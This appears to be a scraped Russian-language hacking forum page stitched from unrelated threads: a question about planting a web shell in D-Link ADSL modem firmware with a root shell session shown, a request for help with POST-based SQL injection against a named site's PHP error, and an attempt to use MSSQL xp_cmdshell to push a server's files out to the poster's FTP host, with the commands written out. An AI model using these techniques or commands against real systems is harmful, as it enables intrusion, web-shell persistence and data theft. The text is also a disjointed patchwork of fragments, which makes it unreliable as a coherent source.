Ro Man said:
возможно ли в прошивку модема адсл вшить веб шелл?
Зачем? Что толку от веб-шелла то?
p.s хотя можно попробовать залить cgi шелл, но не уверен.
Код:
Login: admin
Password:
NAME=DSL_2640NRU
VERSION=1.0.0
BUILDTIME=Fri Mar 18 08:01:43 UTC 2011
VENDOR=D-Link Russia
BUGS=
SUMMARY=Root filesystem image for DSL_2640NRU
BOARDID=96328AVNG_N31
For help, type 'help' or '?'.
DSL_2640NRU# sh
BusyBox v1.00 (2011.03.18-07:59+0000) Built-in shell (msh)
Enter 'help' for a list of built-in commands.
# ls /
VERSION data etc linuxrc opt sbin tmp var
bin dev lib mnt proc sys usr webs
# ls /webs/
www
# ls /webs/www
css favicon.ico index.cgi passw.html
dlink.css fwupdate.cgi index.html scripts
fastweb.cgi image info.html templates
#
Warning: mysql_numrows(): supplied argument is not a valid MySQL result resource in /home/cdmag/data/www/dvdshka.ru/partners/partners_ufunctions.php on line 264
Адрес электронной почты не может быть без символа "@"
Вы не указали адреса своих сайтов
Вы не правильно указали WMR кош
______________________________________________
Каким образом выполнить SQL инъекция по методу post исходя из текущих данных?
Вот вопросег... есть юзер mssql (2008 r2), с xp_cmdshell. Хочу зааплоудить файлики с харда серва на фтп. Делаю так со своей машины :
Start run cmd ->
Код:
ftp -A -i -s:\\IP_ADDR\Users\Public\cmd.txt IP_ADDR
Всё канает - фтп выполняет содержимое cmd.txt после подключения к ftp. Но вот если делать так :
Код:
exec xp_cmdshell 'c:\windows\system32\ftp.exe -A -i -s:\\IP_ADDR\Users\Public\cmd.txt IP_ADDR'
- канать не хочет. Пишет
Код:
Error opening script file \\IP_ADDR\Users\Public\cmd.txt.
Error opening script file \\IP_ADDR\Users\Public\cmd.txt.
NULL
Transfers files to and from a computer running an FTP server service
(sometimes called a daemon). Ftp can be used interactively.
.............................